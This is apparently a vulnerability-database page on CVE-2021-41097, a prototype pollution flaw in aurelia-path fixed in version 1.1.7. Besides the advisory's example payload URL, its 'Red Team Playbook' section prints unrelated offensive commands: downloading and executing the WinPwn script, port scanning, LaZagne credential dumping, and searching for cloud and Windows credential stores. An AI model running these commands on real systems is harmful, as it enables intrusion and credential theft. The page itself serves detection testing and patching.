CVE-2021-41097
Overview
This vulnerability is a prototype pollution flaw affecting the aurelia-path package, a utility for path manipulation within the Aurelia platform. The root cause lies in unsafe handling of input strings parsed by aurelia-path, allowing modification of the base Object prototype. Specifically, the vulnerable component improperly processes URL query parameters, enabling injection of properties into Object.prototype.
Vulnerability Description
aurelia-path is part of the Aurelia platform and contains utilities for path manipulation. There is a prototype pollution vulnerability in aurelia-path before version 1.1.7. The vulnerability exposes Aurelia application that uses `aurelia-path` package to parse a string. The majority of this will be Aurelia applications that employ the `aurelia-router` package. An example is this could allow an attacker to change the prototype of base object class `Object` by tricking an application to parse the following URL: `https://aurelia.io/blog/?__proto__[asdf]=asdf`. The problem is patched in version `1.1.7`.
Impact
An unauthenticated remote attacker can manipulate the prototype of the base Object class in affected Aurelia applications by supplying malicious URLs, potentially altering application behavior or bypassing security controls. This can lead to data integrity issues or unauthorized access within the client-side application context. The vulnerability requires no user interaction or privileges (AV:N/AC:L/PR:N/UI:N), making exploitation straightforward in exposed environments. The attack surface primarily includes web applications parsing URLs with aurelia-path.
Solution
Upgrade aurelia-path to version 1.1.7 or later, where the prototype pollution vulnerability is patched as detailed in the GitHub advisory GHSA-3c9c-2p65-qvwv (https://github.com/aurelia/path/security/advisories/GHSA-3c9c-2p65-qvwv). Review application dependencies to ensure aurelia-path is updated, and monitor the referenced commit 7c4e235433a4a2df9acc313fbe891758084fdec1 for the specific fix implementation. No alternative workarounds are documented in the advisory.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the aurelia-path package is rooted in its handling of path manipulation, specifically through prototype pollution. This occurs when an attacker is able to inject properties into the prototype of a base object, such as the JavaScript `Object`. In the context of aurelia-path, this vulnerability arises when the package is used to parse URLs without adequate validation or sanitization of input. By crafting a malicious URL that includes a prototype manipulation payload, an attacker can exploit this flaw to alter the behavior of the application, potentially leading to unauthorized access or manipulation of application data.
Attack vectors for this vulnerability primarily involve tricking an application into processing a specially crafted URL. For instance, an attacker could send a link to a victim that appears legitimate but contains the malicious payload. When the victim's application parses the URL, the prototype pollution occurs, allowing the attacker to modify the properties of objects within the application. This could lead to a range of exploitation scenarios, including but not limited to the ability to overwrite existing methods, introduce new properties, or even execute arbitrary code if the application relies on the altered object properties in a critical manner. The risk is particularly pronounced in applications that utilize the aurelia-router package, as they are more likely to handle user-generated URLs.
The real-world impact of this vulnerability can be significant, especially for organizations that rely on the Aurelia framework for their web applications. The ability to manipulate object prototypes can lead to severe security breaches, including data leakage, unauthorized actions, or even complete application compromise. For businesses, this translates into potential financial losses, reputational damage, and regulatory repercussions, particularly if sensitive user data is exposed. The severity of the vulnerability, reflected in its CVSS score of 7.5, underscores the importance of addressing this issue promptly to mitigate risks.
To detect this vulnerability, organizations should implement robust monitoring and logging mechanisms that can identify unusual patterns in application behavior, particularly those related to object manipulation. Code reviews and static analysis tools can also be employed to identify instances where the aurelia-path package is used, ensuring that it is updated to the patched version. Furthermore, organizations should adopt a proactive approach to security by implementing input validation and sanitization practices across their applications, particularly for any user-generated content that may be processed by the aurelia-path package.
Mitigation strategies should focus on upgrading the aurelia-path package to version 1.1.7 or later, where the vulnerability has been addressed. Additionally, organizations should conduct thorough testing of their applications to ensure that no residual effects of the vulnerability remain. Regular security assessments and vulnerability scans can help identify any other potential weaknesses in the application stack, fostering a culture of security awareness and resilience. By taking these steps, organizations can significantly reduce their exposure to the risks associated with this vulnerability and enhance their overall security posture.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Bluespire | Aurelia-Path | All |
cpe:2.3:a:bluespire:aurelia-path:*:*:*:*:*:node.js:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (6)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2021-41097 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/aurelia/path/security/advisories/GHSA-3c9c-2p65-qvwv |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/aurelia/path/issues/44 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/aurelia/path/commit/7c4e235433a4a2df9acc313fbe891758084fdec1 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/aurelia/path/releases/tag/1.1.7 |
| npmjs.com |
GitHub CVE
x_refsource_MISC
|
https://www.npmjs.com/package/aurelia-path |